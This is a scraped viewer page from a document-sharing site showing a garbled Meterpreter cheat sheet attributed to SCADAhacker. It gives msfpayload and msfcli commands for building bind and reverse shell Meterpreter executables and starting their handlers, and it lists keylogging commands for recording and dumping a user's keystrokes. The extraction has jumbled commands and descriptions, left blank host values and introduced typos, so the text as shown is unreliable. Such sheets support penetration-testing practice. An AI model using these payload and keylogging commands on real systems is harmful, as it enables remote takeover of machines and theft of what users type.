Home
Add Document
Sign In
Create An Account
Viewer
Transcript
Meterpreter Cheat Sheet version: 0.1 Executing Meterpreter
User Interface Commands
As a Metasploit Exploit Payload (bind_tcp) for bind shell or (reverse_tcp) for reverse shell
meterpreter> idletime
As Standalone binary to be uploaded and executed on the target system:
Displays how much time the user is inactive
meterpreter> keyscan_start ./msfpayload windows/meterpreter/bind_tcp LPORT=443 X > meterpreter.exe (Bind Shell)
Starts recording user key typing
./msfcli exploit/multi/handler PAYLOAD=windows/meterpeter/bind_tcp LPORT=443 RHOST=
meterpreter>keyscan_dump
./msfpayload wndows/meterpreter/reverse_tcp RHOST=
RPORT=443 X > meterpreter.exe (Reverse Shell)
Dumps the user’s key strokes
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=443 E
meterpreter> keyscan_stop Stops recording user typing
Core Commands meterpreter> background
meterpreter> use
meterpreter> run
Recommend Documents
No documents
×
Report Meterpreter Cheat Sheet - SCADAhacker
Your name
Email
Reason
-Select Reason-
Pornographic
Defamatory
Illegal/Unlawful
Spam
Other Terms Of Service Violation
File a copyright complaint
Description
×
Sign In
Email
Password
Remember Password
Forgot Password?
Sign In